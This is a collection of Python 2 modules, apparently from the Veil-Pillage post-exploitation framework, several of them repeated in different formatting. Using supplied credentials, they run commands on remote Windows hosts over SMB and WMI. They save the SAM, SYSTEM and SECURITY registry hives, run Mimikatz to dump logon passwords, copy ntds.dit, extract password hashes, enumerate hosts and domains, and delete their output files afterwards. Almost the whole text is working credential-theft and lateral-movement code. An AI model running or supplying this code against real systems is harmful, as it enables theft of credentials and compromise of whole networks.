def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
fileName = self.required_options["fileName"][0]
deleteFile = self.required_options["delete"][0]
for target in self.targets:
print "\n [*] downloading '"+fileName+"' from "+target
# check if the user wants to delete the file after download
if deleteFile.lower() == "true":
out = smb.getFile(target, username, password, fileName, delete=True)
else:
out = smb.getFile(target, username, password, fileName, delete=False)
if out == "":
self.output += "[!] File '"+fileName+"' from "+target+" using creds '"+username+":"+password+"' empty or doesn't exist\n"
# TODO: keep this "" or change to None if nothing is returned?
else:
# write the module out to the appropriate output location
saveName = helpers.saveModuleFile(self, target, fileName.split("\\")[-1], out)
self.output += "[*] File '"+fileName+"' from "+target+" using creds '"+username+":"+password+"' saved to "+saveName+"\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
outFile = self.required_options["out_file"][0]
if "\\" not in outFile:
# otherwise assume it's an absolute path
outFile = "C:\\Windows\\Temp\\" + outFile
for target in self.targets:
targetUsernames = []
command = "echo IPCONFIG:>>%(p)s&ipconfig /all>>%(p)s&echo ARP:>>%(p)s&arp -a>>%(p)s&echo NET USERS:>>%(p)s&net users>>%(p)s&echo NET SESSIONS:>>%(p)s&net sessions>>%(p)s&echo QWINSTA:>>%(p)s&qwinsta>>%(p)s&echo NETSTAT:>>%(p)s&netstat -nao>>%(p)s&echo TASKLIST:>>%(p)s&tasklist /v>>%(p)s&echo SYSTEMINFO:>>%(p)s&systeminfo>>%(p)s" %{"p":outFile}
# execute the command
result = command_methods.executeCommand(target, username, password, command, triggerMethod)
# wait 20 seconds for "systeminfo" to run
print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True)
time.sleep(20)
# # grab the output file and delete it
out = smb.getFile(target, username, password, outFile, delete=True)
if out != "":
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "enum_host.txt", out)
self.output += "[*] enum_host results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
else:
self.output += "[!] enum_host failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
out_file = self.required_options["out_file"][0]
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
for target in self.targets:
# grab the output file and delete it
out = smb.getFile(target, username, password, out_file, delete=True)
# delete the netview.exe binary
smb.deleteFile(target, username, password, "C:\\Windows\\Temp\\netview.exe")
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "netview.txt", out)
if out != "":
self.output += "[*] netview.exe results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
else:
self.output += "[!] netview.exe execution failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
out_file = self.required_options["out_file"][0]
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
for target in self.targets:
# grab the output file and delete it
out = smb.getFile(target,
username,
password,
out_file,
delete=True)
# delete the netview.exe binary
smb.deleteFile(target, username, password,
"C:\\Windows\\Temp\\netview.exe")
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "netview.txt", out)
if out != "":
self.output += "[*] netview.exe results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] netview.exe execution failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
def winexeExecuteResult(target, username, password, cmd, pause=1):
"""
Run a particular command with winexeCommand(), get the result
with getFile() and delete the temporary output file.
'pause' is the number of seconds between execution of the command
and the grabbing of the temporary file, defaults to 1 second
Returns the result of the command on success, and "failure" on failure.
"""
# choose a random output file
outputFile = helpers.randomString() + ".txt"
# execute the wmisCommand and specify the output file to be our randomized name
output = winexeCommand(target, username, password, cmd, outputFile=outputFile)
# check if the command was successful
if output == "success":
# sleep for a bit of time before we grab the output file
time.sleep(pause)
# retrieve the output file and delete it
return smb.getFile(target, username, password, "C:\\Windows\\Temp\\"+outputFile, delete=True)
return output
def winexeExecuteResult(target, username, password, cmd, pause=1):
"""
Run a particular command with winexeCommand(), get the result
with getFile() and delete the temporary output file.
'pause' is the number of seconds between execution of the command
and the grabbing of the temporary file, defaults to 1 second
Returns the result of the command on success, and "failure" on failure.
"""
# choose a random output file
outputFile = helpers.randomString() + ".txt"
# execute the wmisCommand and specify the output file to be our randomized name
output = winexeCommand(target,
username,
password,
cmd,
outputFile=outputFile)
# check if the command was successful
if output == "success":
# sleep for a bit of time before we grab the output file
time.sleep(pause)
# retrieve the output file and delete it
return smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\" + outputFile,
delete=True)
return output
def run(self):
# assume single set of credentials
username, password = self.creds[0]
use_ssl = self.required_options["use_ssl"][0]
lhost = self.required_options["lhost"][0]
triggerMethod = self.required_options["trigger_method"][0]
delay = self.required_options["delay"][0]
out_file = self.required_options["out_file"][0]
# the temporary output file gpp-password will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# path to the PowerSploit Invoke-Mimikatz.ps1 powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-Mimikatz.ps1"
# Mimikatz command to run
scriptArguments = "Invoke-Mimikatz -Dumpcreds"
# trigger the powershell download on all targets
# ignore the architecture-independent cradle
delivery_methods.powershellHostTrigger(self.targets,
username,
password,
secondStagePath,
lhost,
scriptArguments,
triggerMethod=triggerMethod,
outFile=out_file,
ssl=use_ssl,
noArch=True)
print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
time.sleep(int(delay))
for target in self.targets:
# grab the output file and delete it
out = smb.getFile(target,
username,
password,
out_file,
delete=True)
if out != "":
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt",
out)
self.output += "[*] Powersploit:Invoke-Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] Powersploit:Invoke-Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
fileName = self.required_options["fileName"][0]
deleteFile = self.required_options["delete"][0]
for target in self.targets:
print "\n [*] downloading '" + fileName + "' from " + target
# check if the user wants to delete the file after download
if deleteFile.lower() == "true":
out = smb.getFile(target,
username,
password,
fileName,
delete=True)
else:
out = smb.getFile(target,
username,
password,
fileName,
delete=False)
if out == "":
self.output += "[!] File '" + fileName + "' from " + target + " using creds '" + username + ":" + password + "' empty or doesn't exist\n"
# TODO: keep this "" or change to None if nothing is returned?
else:
# write the module out to the appropriate output location
saveName = helpers.saveModuleFile(self, target,
fileName.split("\\")[-1],
out)
self.output += "[*] File '" + fileName + "' from " + target + " using creds '" + username + ":" + password + "' saved to " + saveName + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
use_ssl = self.required_options["use_ssl"][0]
lhost = self.required_options["lhost"][0]
triggerMethod = self.required_options["trigger_method"][0]
host_file = self.required_options["host_file"][0]
# the protected file on the host to copy
if host_file == "ntdis.dit":
host_file = "C:\\Windows\\ntds\\ntds.dit"
# Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\windows\temp\ntds.dit"
# local file to copy into
localFile = "C:\\Windows\\Temp\\"+host_file.split("\\")[-1]
# path to the PowerSploit Invoke-Mimikatz.ps1 powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH+"/data/PowerSploit/Invoke-NinjaCopy.ps1"
# pass the arguments to invoke ninja-copy
scriptArguments = "Invoke-NinjaCopy -Path \""+host_file+"\" -LocalDestination "+localFile
# trigger the powershell download on all targets
delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod=triggerMethod, ssl=use_ssl)
for target in self.targets:
self.output += "[*] Powersploit:Invoke-NinjaCopy triggered using creds '"+username+":"+password+"' on "+target+"\n"
print "\n [*] Waiting 30s for NinjaCopy to run..."
time.sleep(30)
for target in self.targets:
# grab the output file and delete it
out = smb.getFile(target, username, password, localFile, delete=False)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, host_file.split("\\")[-1], out)
if out != "":
self.output += "[*] Powersploit:Invoke-NinjaCopy results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
else:
self.output += "[!] Powersploit:Invoke-NinjaCopy failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self):
allHashes = []
# assume single set of credentials for this module
username, password = self.creds[0]
use_ssl = self.required_options["use_ssl"][0]
lhost = self.required_options["lhost"][0]
triggerMethod = self.required_options["trigger_method"][0]
delay = self.required_options["delay"][0]
# the temporary output file powerdump will write to
outFile = "C:\\Windows\\Temp\\sys32.out"
# path to the PowerSploit Invoke-Mimikatz.ps1 powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH+"/data/misc/powerdump.ps1"
# execute the host/trigger command with all the targets
delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, triggerMethod=triggerMethod, outFile=outFile, ssl=use_ssl)
print "\n [*] Waiting "+delay+"s for powerdump to run..."
time.sleep(int(delay))
for target in self.targets:
# grab the output file and delete it
out = smb.getFile(target, username, password, outFile, delete=True)
if out != "":
self.output += "[*] powerdump results using creds '"+username+":"+password+"' on "+target+" :\n"
# self.output += out + "\n"
# parse the powerdump output
hashes = helpers.parseHashdump(out)
allHashes.extend(hashes)
self.output += "\n".join(allHashes)
else:
self.output += "[!] powerdump failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
if len(allHashes) > 0:
allHashes = sorted(set(allHashes))
self.output += "\n[*] All unique hashes:\n" + "\n".join(allHashes) + "\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
outFile = self.required_options["out_file"][0]
# wmis doesn't like net * /domain commands >_<
triggerMethod = "winexe"
if "\\" not in outFile:
# otherwise assume it's an absolute path
outFile = "C:\\Windows\\Temp\\" + outFile
for target in self.targets:
targetUsernames = []
command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s" % {
"p": outFile
}
# execute the command
result = command_methods.executeCommand(target, username, password,
command, triggerMethod)
# wait 20 seconds for commands to run
print helpers.color(
"\n [*] Waiting 20 seconds for enumeration commands to run on '"
+ target + "'",
status=True)
time.sleep(20)
# # grab the output file and delete it
out = smb.getFile(target, username, password, outFile, delete=True)
if out != "":
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target,
"enum_domain.txt", out)
self.output += "[*] enum_domain results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] enum_domain failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
trigger_method = self.required_options["trigger_method"][0]
for target in self.targets:
command = "echo %USERPROFILE%"
user_profile = command_methods.executeResult(target, username, password, command, trigger_method)
if user_profile == '':
self.output += " [!] No result file querying env variables using creds " + username + ":" + password + " on: " + target + "\n"
else:
user_profile = user_profile.strip(" \r\n")
recent_path1 = user_profile + "\\Recent"
recent_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Windows\\Recent"
office_path1 = user_profile + "\\Application Data\\Microsoft\\Office\\Recent"
office_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Office\\Recent"
self.output += " [*] Enumerating recent files on %s \n" % target
for path in [recent_path1, recent_path2, office_path1, office_path2]:
files = smb.ls(target, username, password, path, path_error=False)
if len(files) > 0:
self.output += " [*] Found %s files \n" % len(files)
for file in files:
if file[-3:] == "lnk":
out = smb.getFile(target, username, password, path + "\\" + file, delete=False)
if out == '':
self.output += " [!] Failed retrieving : %s \n" % file
else:
save_path = helpers.saveModuleFile(self, target, file, out)
self.output += " [*] .lnk file %s saved from %s to %s\n" % (file,path,save_path)
try:
# parsed_lnk = str(pylnk.parse(save_path)).decode('cp1252')
parsed_lnk = pylnker.parse_lnk(save_path)
details_path = helpers.saveModuleFile(self, target, file + '_details', parsed_lnk)
self.output += " [*] .lnk file %s parsed and saved to %s\n" % (save_path,details_path)
except:
self.output += " [!] Error while parsing : %s \n" % save_path
def smbexecExecuteResult(target, username, password, cmd, pause=1):
"""
Calls a modified version of Impacket's smbexec.py example
and returns the output of the command passed.
code hosted in ./lib/smb.py
Creates a service but doesn't drop any binary to disk.
"""
# choose a random output file
outputFile = helpers.randomString() + ".txt"
# run the command
smbexecCommand(target, username, password, cmd, outputFile=outputFile)
# sleep for a bit of time before we grab the output file
time.sleep(pause)
# return the output
return smb.getFile(target, username, password, "C:\\Windows\\Temp\\"+outputFile, delete=True)
def run(self):
# assume single set of credentials
username, password = self.creds[0]
use_ssl = self.required_options["use_ssl"][0]
lhost = self.required_options["lhost"][0]
triggerMethod = self.required_options["trigger_method"][0]
delay = self.required_options["delay"][0]
out_file = self.required_options["out_file"][0]
# the temporary output file gpp-password will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# path to the PowerSploit Invoke-Mimikatz.ps1 powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH+"/data/PowerSploit/Invoke-Mimikatz.ps1"
# Mimikatz command to run
scriptArguments = "Invoke-Mimikatz -Dumpcreds"
# trigger the powershell download on all targets
# ignore the architecture-independent cradle
delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod=triggerMethod, outFile=out_file, ssl=use_ssl, noArch=True)
print "\n [*] Waiting "+delay+"s for Mimikatz to run..."
time.sleep(int(delay))
for target in self.targets:
# grab the output file and delete it
out = smb.getFile(target, username, password, out_file, delete=True)
if out != "":
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
self.output += "[*] Powersploit:Invoke-Mimikatz results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
else:
self.output += "[!] Powersploit:Invoke-Mimikatz failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def run(self):
# assume single set of credentials
username, password = self.creds[0]
outFile = self.required_options["out_file"][0]
# wmis doesn't like net * /domain commands >_<
triggerMethod = "winexe"
if "\\" not in outFile:
# otherwise assume it's an absolute path
outFile = "C:\\Windows\\Temp\\" + outFile
for target in self.targets:
targetUsernames = []
command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s"%{"p":outFile}
# execute the command
result = command_methods.executeCommand(target, username, password, command, triggerMethod)
# wait 20 seconds for commands to run
print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True)
time.sleep(20)
# # grab the output file and delete it
out = smb.getFile(target, username, password, outFile, delete=True)
if out != "":
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "enum_domain.txt", out)
self.output += "[*] enum_domain results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n"
else:
self.output += "[!] enum_domain failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
def smbexecExecuteResult(target, username, password, cmd, pause=1):
"""
Calls a modified version of Impacket's smbexec.py example
and returns the output of the command passed.
code hosted in ./lib/smb.py
Creates a service but doesn't drop any binary to disk.
"""
# choose a random output file
outputFile = helpers.randomString() + ".txt"
# run the command
smbexecCommand(target, username, password, cmd, outputFile=outputFile)
# sleep for a bit of time before we grab the output file
time.sleep(pause)
# return the output
return smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\" + outputFile,
delete=True)
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
lhost = self.required_options["lhost"][0]
use_ssl = self.required_options["use_ssl"][0]
force_method = self.required_options["force_method"][0]
delay = self.required_options["delay"][0]
out_file = self.required_options["out_file"][0]
# let's keep track of all credentials found
allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []
for target in self.targets:
powershellInstalled = False
# check if we're forcing a particular grab method
if force_method.lower() == "binary":
powershellInstalled = False
elif force_method.lower() == "powershell":
powershellInstalled = True
else:
# check if we have a functional Powershell installation
powershellCommand = "powershell.exe -c \"$a=42;$a\""
powershellResult = command_methods.executeResult(
target, username, password, powershellCommand, "wmis")
if powershellResult.strip() == "42": powershellInstalled = True
if powershellInstalled:
# do powersploit combined file of invoke-mimikatz and powerdump
print helpers.color("\n [*] Powershell installed on " + target)
self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"
# the temporary output file we will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# path to the combined Invoke-Mimikatz/powerdump powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"
# trigger the powershell download on just this target
delivery_methods.powershellHostTrigger(target,
username,
password,
secondStagePath,
lhost,
"",
triggerMethod="winexe",
outFile=out_file,
ssl=use_ssl,
noArch=True)
print "\n [*] Waiting " + delay + "s for Autograb to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target,
username,
password,
out_file,
delete=True)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "autograb.txt",
out)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# parse the powerdump component
hashes = helpers.parseHashdump(out)
allhashes.extend(hashes)
if out != "":
self.output += "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
else:
# do reg.exe for hashdump and host/execute for mimikatz
print helpers.color("\n [!] Powershell not installed on " +
target,
warning=True)
print helpers.color(
"\n [*] Using reg.exe save method for hash dumping on " +
target)
self.output += "[!] Powershell not installed on " + target + "\n"
# reg.exe command to save off the hives
regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
# execute the registry save command
command_methods.executeCommand(target, username, password,
regSaveCommand, "wmis")
print helpers.color("\n [*] Dumping hashes on " + target)
# sleep for 5 seconds to let everything backup
time.sleep(5)
# grab all of the backed up files
systemFile = smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\system",
delete=False)
securityFile = smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\security",
delete=False)
samFile = smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\sam",
delete=False)
# more error-checking here?
if systemFile == "":
self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open('/tmp/system', 'w')
f.write(systemFile)
f.close()
if securityFile == "":
self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open('/tmp/security', 'w')
f.write(securityFile)
f.close()
if samFile == "":
self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open('/tmp/sam', 'w')
f.write(samFile)
f.close()
# get all the hashes from these hives
out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
# save the output file off
saveLocation = helpers.saveModuleFile(self, target,
"creddump.txt", out)
self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"
# save these off to the universal list
hashes = helpers.parseHashdump(out)
allhashes.extend(hashes)
# now, detect the architecture
archCommand = "echo %PROCESSOR_ARCHITECTURE%"
archResult = command_methods.executeResult(
target, username, password, archCommand, "wmis")
arch = "x86"
if "64" in archResult: arch = "x64"
# now time for ze mimikatz!
mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
# the temporary output file we will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file
# host mimikatz.exe and trigger it ONLY on this particular machine
# so we can get the architecture correct
delivery_methods.hostTrigger(target,
username,
password,
mimikatzPath,
lhost,
triggerMethod="wmis",
exeArgs=exeArgs)
print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target,
username,
password,
out_file,
delete=True)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt",
out)
if out != "":
self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
else:
self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
if len(allhashes) > 0:
allhashes = sorted(set(allhashes))
self.output += "[*] All unique hashes:\n\t" + "\n\t".join(
allhashes) + "\n"
if len(allmsv) > 0:
allmsv = sorted(set(allmsv))
self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
if len(allkerberos) > 0:
allkerberos = sorted(set(allkerberos))
self.output += "[*] All kerberos:\n\t" + "\n\t".join(
allkerberos) + "\n"
if len(allwdigest) > 0:
allwdigest = sorted(set(allwdigest))
self.output += "[*] All wdigest:\n\t" + "\n\t".join(
allwdigest) + "\n"
if len(alltspkg) > 0:
alltspkg = sorted(set(alltspkg))
self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
lhost = self.required_options["lhost"][0]
use_ssl = self.required_options["use_ssl"][0]
force_method = self.required_options["force_method"][0]
delay = self.required_options["delay"][0]
out_file = self.required_options["out_file"][0]
# let's keep track of all credentials found
allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []
for target in self.targets:
powershellInstalled = False
# check if we're forcing a particular grab method
if force_method.lower() == "binary":
powershellInstalled = False
elif force_method.lower() == "powershell":
powershellInstalled = True
else:
# check if we have a functional Powershell installation
powershellCommand = 'powershell.exe -c "$a=42;$a"'
powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis")
if powershellResult.strip() == "42":
powershellInstalled = True
if powershellInstalled:
# do powersploit combined file of invoke-mimikatz and powerdump
print helpers.color("\n [*] Powershell installed on " + target)
self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"
# the temporary output file we will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
# path to the combined Invoke-Mimikatz/powerdump powershell script
secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"
# trigger the powershell download on just this target
delivery_methods.powershellHostTrigger(
target,
username,
password,
secondStagePath,
lhost,
"",
triggerMethod="winexe",
outFile=out_file,
ssl=use_ssl,
noArch=True,
)
print "\n [*] Waiting " + delay + "s for Autograb to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target, username, password, out_file, delete=True)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# parse the powerdump component
hashes = helpers.parseHashdump(out)
allhashes.extend(hashes)
if out != "":
self.output += (
"[*] Autograb.ps1 results using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " stored at "
+ saveFile
+ "\n"
)
else:
self.output += (
"[!] Autograb.ps1 failed using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " : no result file\n"
)
else:
# do reg.exe for hashdump and host/execute for mimikatz
print helpers.color("\n [!] Powershell not installed on " + target, warning=True)
print helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target)
self.output += "[!] Powershell not installed on " + target + "\n"
# reg.exe command to save off the hives
regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
# execute the registry save command
command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")
print helpers.color("\n [*] Dumping hashes on " + target)
# sleep for 5 seconds to let everything backup
time.sleep(5)
# grab all of the backed up files
systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False)
securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False)
samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False)
# more error-checking here?
if systemFile == "":
self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open("/tmp/system", "w")
f.write(systemFile)
f.close()
if securityFile == "":
self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open("/tmp/security", "w")
f.write(securityFile)
f.close()
if samFile == "":
self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open("/tmp/sam", "w")
f.write(samFile)
f.close()
# get all the hashes from these hives
out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
# save the output file off
saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
self.output += (
"[*] dumped hashes (reg.exe) using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " saved to "
+ saveLocation
+ "\n"
)
# save these off to the universal list
hashes = helpers.parseHashdump(out)
allhashes.extend(hashes)
# now, detect the architecture
archCommand = "echo %PROCESSOR_ARCHITECTURE%"
archResult = command_methods.executeResult(target, username, password, archCommand, "wmis")
arch = "x86"
if "64" in archResult:
arch = "x64"
# now time for ze mimikatz!
mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
# the temporary output file we will write to
if "\\" not in out_file:
# otherwise assume it's an absolute path
out_file = "C:\\Windows\\Temp\\" + out_file
exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file
# host mimikatz.exe and trigger it ONLY on this particular machine
# so we can get the architecture correct
delivery_methods.hostTrigger(
target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs
)
print "\n [*] Waiting " + delay + "s for Mimikatz to run..."
time.sleep(int(delay))
# grab the output file and delete it
out = smb.getFile(target, username, password, out_file, delete=True)
# parse the mimikatz output and append it to our globals
(msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
allmsv.extend(msv1_0)
allkerberos.extend(kerberos)
allwdigest.extend(wdigest)
alltspkg.extend(tspkg)
# save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
if out != "":
self.output += (
"[*] Mimikatz results using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " stored at "
+ saveFile
+ "\n"
)
else:
self.output += (
"[!] Mimikatz failed using creds '"
+ username
+ ":"
+ password
+ "' on "
+ target
+ " : no result file\n"
)
if len(allhashes) > 0:
allhashes = sorted(set(allhashes))
self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n"
if len(allmsv) > 0:
allmsv = sorted(set(allmsv))
self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
if len(allkerberos) > 0:
allkerberos = sorted(set(allkerberos))
self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
if len(allwdigest) > 0:
allwdigest = sorted(set(allwdigest))
self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
if len(alltspkg) > 0:
alltspkg = sorted(set(alltspkg))
self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"
def run(self):
# assume single set of credentials for this module
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
# let's keep track of ALL hashes found
allHashes = ""
# reg.exe command to save off the hives
regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
for target in self.targets:
print helpers.color("\n [*] Dumping hashes on " + target)
# execute the registry save command
command_methods.executeCommand(target, username, password,
regSaveCommand, triggerMethod)
# sleep for 5 seconds to let everything backup
time.sleep(5)
# grab all of the backed up files
systemFile = smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\system",
delete=False)
securityFile = smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\security",
delete=False)
samFile = smb.getFile(target,
username,
password,
"C:\\Windows\\Temp\\sam",
delete=False)
error = False
if systemFile == "":
self.output += "[!] File '" + systemFile + "' from " + target + " empty or doesn't exist\n"
error = True
else:
f = open('/tmp/system', 'w')
f.write(systemFile)
f.close()
if securityFile == "":
self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n"
else:
f = open('/tmp/security', 'w')
f.write(securityFile)
f.close()
if samFile == "":
self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n"
error = True
else:
f = open('/tmp/sam', 'w')
f.write(samFile)
f.close()
if not error:
# get all the hashes from these hives
hashes = creddump.dump_file_hashes("/tmp/system", "/tmp/sam")
# add the hashes to our global list
allHashes += hashes
